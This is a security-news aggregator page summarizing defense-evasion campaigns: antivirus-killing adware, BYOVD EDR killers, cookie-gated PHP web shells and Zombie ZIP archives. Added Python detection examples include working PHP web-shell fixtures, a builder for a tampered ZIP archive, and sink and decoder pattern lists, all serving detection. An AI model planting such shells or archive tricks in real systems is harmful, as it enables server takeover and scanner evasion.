< ciso brief />

All news with the #defense evasion tag

108 articles

Signed Adware Used to Deploy Antivirus-Killing Scripts

🔒 Huntress researchers uncovered a digitally signed adware campaign that deployed SYSTEM‑privilege payloads to disable antivirus protections on thousands of endpoints. The binaries, signed by Dragon Boss Solutions LLC and bundled in browser-like PUPs such as Chromstera and WorldWideWeb, used an Advanced Installer MSI to drop a PowerShell script, ClockRemoval.ps1, which stops services, uninstalls AV products, edits the hosts file and persists via WMI event subscriptions and scheduled tasks. After registering an update domain the operator had left unclaimed, Huntress sinkholed the infrastructure and observed more than 23,500 infected hosts checking in from 124 countries, including hundreds inside high-value networks. Administrators are urged to hunt for the specific WMI subscriptions and scheduled tasks, for security-vendor domains blocked in the hosts file, and for processes signed by the publisher.

Signed Adware Operation Disables Antivirus on 23,000 Hosts

⚠️ Huntress has identified a signed adware operation linked to Dragon Boss Solutions LLC that has disabled antivirus products on 23,565 endpoints worldwide. The campaign leverages a legitimate code‑signing certificate and an MSI update mechanism to deploy a PowerShell payload, ClockRemoval.ps1, which kills, uninstalls and blocks reinstallation of AV products. Targets include Malwarebytes, Kaspersky, McAfee and ESET, and persistence is maintained via scheduled tasks and WMI event subscriptions. Researchers sinkholed an unregistered update domain and observed infections across 124 countries, including universities, utilities and government networks.
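
One concrete piece of the hunt recommended in the two items above, the hosts-file check, as an added example that is not Huntress code: it parses a Windows hosts file and reports every security-vendor name the file overrides, distinguishing entries sinkholed to loopback/unspecified addresses from entries redirected elsewhere. The vendor list is taken from the summary above, and the hosts lines are constructed for illustration; they are not the campaign's actual entries.

```python
import ipaddress

# Assumption for this example: the vendors named in the summary. The domains
# ClockRemoval.ps1 actually blocks are not reproduced here.
SECURITY_VENDOR_SUFFIXES = (
    "malwarebytes.com", "kaspersky.com", "mcafee.com", "eset.com",
)

# Constructed hosts file: the usual commented Windows defaults, one legitimate
# entry, and entries of the kind an AV-disabling script adds so that vendor
# updaters and reinstallers can no longer resolve.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 127.0.0.1       localhost
# ::1             localhost
192.168.1.10    printer.corp.local   print01
0.0.0.0         www.malwarebytes.com malwarebytes.com
127.0.0.1\teset.com   www.eset.com   # looks routine at a glance
0.0.0.0         kaspersky.com
::1             mcafee.com
10.0.0.5        www.mcafee.com
"""


def parse_hosts(text: str):
    """Yield (ip_address, hostname) pairs, ignoring comments, blanks and malformed lines.

    splitlines() copes with the CRLF endings a Windows hosts file normally has.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # not an address; a real hunt would log the line instead
        for host in fields[1:]:
            yield ip, host.lower().rstrip(".")


def is_sink(ip) -> bool:
    """127.0.0.0/8, ::1 and 0.0.0.0 all make a name unreachable."""
    return ip.is_loopback or ip.is_unspecified


def vendor_for(host: str):
    """Return the matching vendor suffix, or None. Suffix match is on label
    boundaries so 'notmcafee.com' does not match 'mcafee.com'."""
    for suffix in SECURITY_VENDOR_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return suffix
    return None


def find_vendor_overrides(text: str) -> list[tuple[str, str, str]]:
    """Return (hostname, ip, classification) for every vendor name the file overrides.

    Any hosts entry for a security vendor is abnormal: 'sinkholed' means the
    name is blackholed, 'redirected' means it now resolves somewhere else.
    """
    findings = []
    for ip, host in parse_hosts(text):
        if vendor_for(host) is None:
            continue
        kind = "sinkholed" if is_sink(ip) else "redirected"
        findings.append((host, str(ip), kind))
    return findings


if __name__ == "__main__":
    for host, ip, kind in find_vendor_overrides(SAMPLE_HOSTS):
        print(f"{kind:10} {ip:>12}  {host}")
```

On a live host, read `C:\Windows\System32\drivers\etc\hosts` into `find_vendor_overrides` and extend `SECURITY_VENDOR_SUFFIXES` with the domains your own endpoint products need; the same suffix check works on DNS query logs if the hosts file has already been restored.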

STX RAT Uses Stealth Tactics to Target Finance Sector

🔐 eSentire's Threat Response Unit identified a previously undocumented remote access trojan, STX RAT, after an attempted deployment in a financial services environment in late February 2026. The malware uses multi-stage, script-based delivery and in-memory execution to evade detection, leveraging XXTEA encryption, Zlib compression and reflective PowerShell loaders. It delays credential theft until instructed by an encrypted C2 channel and implements registry autoruns and COM hijacking for persistence. Organizations should strengthen endpoint protections and limit exposure to script-based attack vectors.

APT28 Turns Insecure Routers into DNS Hijack Nodes

🔐 Lumen's Black Lotus Labs and Microsoft linked a campaign named FrostArmada to APT28 (aka Forest Blizzard), which compromised insecure MikroTik and TP‑Link SOHO routers to change DNS settings and route traffic to attacker-controlled resolvers. The actors used DNS hijacking to perform passive reconnaissance and attacker-in-the-middle (AitM) operations to harvest passwords, OAuth tokens, and other credentials without user interaction. The malicious infrastructure has been disrupted in a multi‑agency operation led by the U.S. Department of Justice and FBI with international partners.

Qilin and Warlock Ransomware Use Vulnerable Drivers

🔒 Cisco Talos and Trend Micro say the Qilin and Warlock ransomware groups have adopted a bring-your-own-vulnerable-driver (BYOVD) approach to disable endpoint security on compromised hosts. Talos identified a malicious DLL named msimg32.dll that side-loads a PE loader which decrypts and executes an in-memory EDR killer. The payload leverages renamed drivers such as rwdrv.sys (a repackaged ThrottleStop.sys) and hlpdrv.sys to read and write physical memory and neutralize a list of more than 300 security-vendor drivers. Warlock has similarly used NSecKrnl.sys and a suite of legitimate tools to persist, move laterally, and exfiltrate data.

Microsoft: Cookie-Controlled PHP Web Shells on Linux

🍪 Microsoft Defender Security Research Team warns that threat actors are increasingly using HTTP cookies as a covert control channel for PHP-based web shells on Linux servers. Instead of passing commands via URL parameters or request bodies, attackers gate execution and convey instructions through values accessible in the PHP $_COOKIE superglobal. This technique keeps malicious code dormant during normal application activity and activates only when specific cookie values are present, reducing observable indicators. Microsoft observed multiple obfuscated loaders and a cron-driven 'self-healing' persistence model that recreates loaders and minimizes forensic visibility.

Cookie-Controlled PHP Webshell Tradecraft for Linux Hosting

🔒 Threat actors are increasingly abusing HTTP cookies as a stealthy control channel for PHP webshells on Linux hosting platforms. By gating execution on specific cookie values, attackers keep loaders dormant during normal traffic and activate functionality only when exact cookie conditions are met. Variants range from multi-stage loaders that reconstruct functions at runtime to single-file interactive shells, often using base64 reconstruction and layered obfuscation to evade detection. Review Microsoft Defender guidance to detect, hunt, and mitigate these threats.
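
A static triage check for the pattern the two items above describe, as an added example that is not Microsoft's detection logic: it first folds concatenated string literals back together so a name split for obfuscation ("ba" . "se64_decode") becomes a single matchable token, then scores four signals: any cookie access, an `if (...)` whose condition reads a cookie, a dangerous sink or a variable-function call (`$f(...)`), and a decoder. The three PHP fixtures are constructed for this example; the gated one follows the shape the report describes (exact-value cookie check, decoder feeding eval) and is not a sample from the campaign. The sink and decoder lists are assumptions, not an exhaustive catalogue.

```python
import re

# Sinks and decoders commonly chained in PHP web shells (assumed list for this example).
SINKS = ("eval", "assert", "system", "passthru", "shell_exec", "exec",
         "popen", "proc_open", "create_function")
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13",
            "hex2bin", "strrev")

# Two adjacent string literals joined with '.', e.g.  "ba" . "se64"
_CONCAT = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1\s*\.\s*(["'])((?:\\.|(?!\3).)*)\3""")


def normalize(src: str) -> str:
    """Fold chains of concatenated literals until nothing changes, so that
    names reconstructed at runtime become one token for the matchers below."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: f'"{m.group(2)}{m.group(4)}"', src)
    return src


def analyze(php_source: str) -> dict:
    """Heuristic score for the cookie-gated web shell pattern.

    '_COOKIE' rather than '$_COOKIE' is matched so $GLOBALS['_COOKIE'] counts
    too. Word-boundary matching on sink names means a comment mentioning
    'system' will also count; this is a triage aid, not a verdict.
    """
    src = normalize(php_source)
    uses_cookie = "_COOKIE" in src
    cookie_gate = re.search(r"\bif\s*\([^)]*_COOKIE", src) is not None
    sinks = [s for s in SINKS if re.search(rf"\b{s}\b", src)]
    decoders = [d for d in DECODERS if re.search(rf"\b{d}\b", src)]
    dynamic_call = re.search(r"\$\w+\s*\(", src) is not None  # $name(...)

    score = ((1 if uses_cookie else 0) + (2 if cookie_gate else 0)
             + (3 if sinks or dynamic_call else 0) + (1 if decoders else 0))
    verdict = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"verdict": verdict, "score": score, "cookie_gate": cookie_gate,
            "sinks": sinks, "decoders": decoders, "dynamic_call": dynamic_call}


# Constructed fixtures (not samples from the campaign).
BENIGN_PHP = """<?php
$theme = isset($_COOKIE['theme']) ? $_COOKIE['theme'] : 'light';
echo '<body class="' . htmlspecialchars($theme) . '">';
"""

GATED_SHELL_PHP = """<?php
if (isset($_COOKIE['_s']) && $_COOKIE['_s'] === 'k3y') {
    $f = "ba" . "se64_" . "dec" . "ode";
    eval($f($_COOKIE['_p']));
}
"""

PLAIN_SHELL_PHP = """<?php system($_REQUEST['c']); ?>"""


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_PHP), ("gated shell", GATED_SHELL_PHP),
                          ("plain shell", PLAIN_SHELL_PHP)):
        print(f"{label:12} {analyze(sample)}")
```

Run `analyze` over every `.php` file under the web root (including files with non-PHP extensions if the server's handler mapping allows them) and review anything scored medium or above; the normalized source is also what you want to grep when an alert only gives you a string fragment.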

Qilin EDR Killer: Multi-Stage msimg32.dll Loader Analysis

🔍 This Talos analysis dissects a malicious msimg32.dll used in Qilin ransomware attacks, detailing a multi-stage PE loader that evades and disables endpoint detection and response (EDR) solutions. The loader employs SEH/VEH obfuscation, syscall-stub reuse, and paging-file-backed sections to decrypt and map payloads entirely in memory without triggering hooks or ETW telemetry. The final EDR killer loads two helper drivers to perform physical memory R/W and to unprotect and terminate guarded processes, enabling it to neutralize over 300 vendor drivers.

Five Critical Steps to Achieve Business Resilience

🔒 The 2026 State of the SOC Report, based on more than 909,000 alerts observed via the Adlumin MDR at the N-able SOC between March and December 2025, lays out five practical steps to preserve operations when attackers strike. It urges layered, defense-in-depth designs that combine identity, endpoint, network, cloud, and perimeter visibility rather than relying on single-point solutions. The guidance highlights automation and SOAR to move containment and remediation to machine speed, modernized endpoint and ITDR identity controls to detect credential abuse, validated immutable backups to enable rapid recovery, and rigorous oversight of AI-driven processes to manage emerging attack surfaces.

Apple adds macOS Terminal warning to block ClickFix

⚠️ Apple has introduced a new security measure in macOS Tahoe 26.4 that delays execution when users paste commands into Terminal and displays a warning highlighting potential risks. The mechanism appears aimed at mitigating ClickFix social‑engineering attacks that trick users into pasting malicious commands. Users may cancel the paste or choose to proceed if they understand the command, and Apple has not yet published official documentation for the behavior.

EtherRAT Uses Ethereum Contracts to Evade Takedowns

🔒 eSentire researchers disclosed on March 25 that a new campaign using a Node.js backdoor, dubbed EtherRAT, leverages Ethereum smart contracts to conceal command-and-control infrastructure. The technique, referred to as EtherHiding, stores C2 addresses on-chain and lets operators rotate servers cheaply. The malware retrieves contract data via public RPC providers, mimics CDN traffic to blend in, collects detailed system fingerprints and steals cryptocurrency wallets and cloud credentials. Organizations are advised to restrict risky Windows utilities, train staff against IT support scams and consider blocking common crypto RPC endpoints.

Iran-Linked Pay2Key Ransomware Re-Emerges with Evasion

🔒 Security researchers warn that the Iran-linked Pay2Key ransomware group has re-emerged with enhanced evasion, execution and anti-forensics capabilities. A Halcyon and Beazley Security analysis of a recent US healthcare provider incident describes interactive access via TeamViewer, credential theft with Mimikatz, LaZagne and ExtPassword, and host discovery using Advanced IP Scanner and ns.exe. Operators used the AD console (dsa.msc) to blend in, deployed an SFX payload (abc.exe) to encrypt systems within three hours, and removed a 'No Defender' toolkit to hide tracks. Report authors found no clear evidence of data exfiltration and warn defenders to monitor this unpredictable, politically motivated threat.

Torg Grabber infostealer targets 728 crypto wallets

🔒 Gen Digital researchers describe a rapidly evolving info‑stealer named Torg Grabber that exfiltrates data from 850 browser extensions, including 728 cryptocurrency wallets. Initial access commonly uses a clipboard hijack and a ClickFix PowerShell trick; the payload runs in memory via reflective loading, direct syscalls and heavy obfuscation. Operators migrated exfiltration to HTTPS through Cloudflare and added an App‑Bound Encryption bypass to harvest Chromium cookie data.

Predator spyware disables iOS camera and mic indicators

🔎 Cybersecurity researchers analyzed Predator, a commercial spyware component developed by Intellexa, and revealed how it disables iOS camera and microphone recording indicators. The malware intercepts communications between the system component that tracks module activity and SpringBoard, exploiting Objective‑C behavior to suppress status signals so the green/orange dots never appear. The report outlines the techniques, traces earlier dead code attempts, and offers practical mitigations for users at elevated risk.

54 EDR Killers Use BYOVD to Exploit 34 Signed Drivers

🔒 A new ESET analysis identified 54 EDR-killer tools that leverage BYOVD, abusing 34 signed vulnerable drivers to gain kernel-mode privileges and neutralize endpoint protection. These utilities are frequently reused in ransomware operations to disable defenses prior to encryption, decoupling evasion from the encryptor. ESET recommends blocking misused drivers and adopting layered detection to mitigate the threat.

Leak Reveals Tactics and Tensions in Gentlemen Ransomware

🔍 Group-IB's March 19 report exposes operational details of the Gentlemen ransomware group after an affiliate known as hastalamuerte leaked internal information. The research describes a rapidly evolving RaaS that sprang from a Qilin ecosystem dispute and leverages a dual-extortion model, cross-platform encryption and automated lateral movement to maximize impact. Primary initial access stems from exposed FortiGate VPN devices, while advanced evasion such as BYOVD and aggressive log deletion are used to frustrate defenders and forensic analysis.

Ransomware Exfiltration Playbook: Abusing Everyday Tools

🔍 The Exfiltration Framework examines how attackers repurpose legitimate OS utilities, third-party endpoint tools, and cloud clients to move sensitive data while evading traditional detections. The research shows that static IOCs and tool-blocking strategies are frequently ineffective when adversaries operate inside trusted software and infrastructure. By normalizing execution context, parent-child process relationships, network patterns, forensic artifacts, and destination characteristics, the framework exposes stable behavioral signals that persist despite masquerading, renaming, or relocation. It recommends correlating endpoint, network, and cloud telemetry, applying behavioral baselining, and focusing on cumulative transfer analysis rather than single-event or allow-list approaches.

EDR killers explained: Beyond vulnerable drivers and tactics

🔒 ESET's research examines the prevalence and mechanics of EDR killers, the separate tools attackers deploy to neutralize endpoint protection immediately before executing encryptors. Based on telemetry and incident analysis of nearly 90 active samples, the blog post covers BYOVD, anti-rootkit abuse, driverless disruption, commercialization of kits, and indicators suggestive of AI-assisted development. The authors highlight predictable affiliate-driven tooling choices and warn that driver-based attribution is often misleading; they recommend prevention-focused, multilayered defenses and rapid containment.

Zombie ZIP attack evades AV and EDR by header abuse

🧟 Researchers disclosed a technique called 'Zombie ZIP' that manipulates ZIP headers to hide DEFLATE-compressed payloads so scanners treat them as uncompressed, producing widespread false negatives in antivirus and EDR tools. The author, Chris Aziz of Bombadil Systems, published proof-of-concept archives showing scanners trust the ZIP Method field and therefore scan raw bytes instead of compressed data. CERT/CC assigned CVE-2026-0866 and recommends stricter archive validation; end users should delete archives that raise 'unsupported method' or extraction errors.
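
The header/payload disagreement at the heart of this technique, as an added example that is not the published proof-of-concept (whose exact header manipulation is not reproduced here): a DEFLATE entry whose Method field is rewritten to 'stored' in both the local header and the central directory. A scanner that trusts the field sees only opaque compressed bytes; a checker that verifies the recorded CRC-32 and uncompressed size against the payload, and tries inflating the bytes when they disagree, exposes the lie. Python's zipfile is used only to build the fixture and to show that a conforming extractor refuses the tampered archive, which is the "extraction error" the advisory tells end users to treat as a red flag.

```python
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"
CENTRAL_SIG = b"PK\x01\x02"
METHOD_STORED, METHOD_DEFLATE = 0, 8


def parse_local_entries(data: bytes):
    """Walk local file headers front to back, as a streaming scanner would.

    Yields the declared method, CRC-32 and sizes plus the raw payload bytes that
    follow each header. Entries using a data descriptor (general-purpose flag
    bit 3) stop the walk: their sizes live after the payload, not in the header.
    """
    pos = 0
    while data[pos:pos + 4] == LOCAL_SIG:
        (_ver, flags, method, _time, _date, crc, csize, usize,
         name_len, extra_len) = struct.unpack_from("<HHHHHIIIHH", data, pos + 4)
        if flags & 0x08:
            return
        name_start = pos + 30
        payload_start = name_start + name_len + extra_len
        yield {
            "name": data[name_start:name_start + name_len].decode("utf-8", "replace"),
            "method": method, "crc": crc, "csize": csize, "usize": usize,
            "payload": data[payload_start:payload_start + csize],
        }
        pos = payload_start + csize


def _inflate(raw: bytes):
    try:
        return zlib.decompress(raw, -15)  # raw DEFLATE stream, no zlib header
    except zlib.error:
        return None


def check_entry(entry: dict) -> str:
    """Return 'ok', or describe how the header misrepresents the payload."""
    payload, declared = entry["payload"], entry["method"]
    if declared == METHOD_STORED:
        as_declared = payload
    elif declared == METHOD_DEFLATE:
        as_declared = _inflate(payload)
    else:
        as_declared = None  # a method this checker does not decode

    def matches(blob) -> bool:
        return (blob is not None and len(blob) == entry["usize"]
                and zlib.crc32(blob) == entry["crc"])

    if matches(as_declared):
        return "ok"
    # The header's story does not fit the bytes. Ask the bytes what they are:
    # if inflating them reproduces the recorded CRC and size, the method lied.
    if declared != METHOD_DEFLATE and matches(_inflate(payload)):
        return (f"method field says {declared} but payload is DEFLATE data "
                f"(CRC/size match only after inflating)")
    return f"method field says {declared}; CRC/size match neither the raw nor the inflated payload"


def scan_archive(data: bytes) -> list[tuple[str, str]]:
    return [(e["name"], check_entry(e)) for e in parse_local_entries(data)]


def extracts_cleanly(data: bytes, name: str) -> bool:
    """True if a conforming extractor (Python's zipfile) reads the entry with a good CRC."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            zf.read(name)
        return True
    except zipfile.BadZipFile:
        return False


def build_samples() -> tuple[bytes, bytes]:
    """Constructed fixtures: a normal DEFLATE archive and a copy whose Method
    fields (local header offset 8, central directory offset 10) say 'stored'
    while the compressed bytes stay exactly where they were."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payload.txt", "stand-in for a compressed executable\n" * 64)
    clean = buf.getvalue()

    zombie = bytearray(clean)
    struct.pack_into("<H", zombie, zombie.find(LOCAL_SIG) + 8, METHOD_STORED)
    struct.pack_into("<H", zombie, zombie.find(CENTRAL_SIG) + 10, METHOD_STORED)
    return clean, bytes(zombie)


if __name__ == "__main__":
    clean, zombie = build_samples()
    for label, blob in (("clean", clean), ("zombie", zombie)):
        for name, verdict in scan_archive(blob):
            print(f"{label:6} {name}: {verdict}; extracts={extracts_cleanly(blob, name)}")
```

The check generalizes beyond this one field: any archive whose recorded CRC and size cannot be reproduced from the payload under its declared method deserves quarantine rather than a pass, because "could not verify" and "clean" are different outcomes.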

Resumes with Malicious ISO Attachments Target HR Teams

📄 Researchers at Aryaka report a campaign distributing malicious resumés with ISO attachments to HR teams. When the image is mounted, an included .lnk executes obfuscated PowerShell that extracts payloads from steganographic images and side-loads a DLL through a signed application. The malware includes a module called BlackSanta and leverages a BYOVD technique to disable EDR. Organizations should restrict accepted resume formats and harden HR intake processes.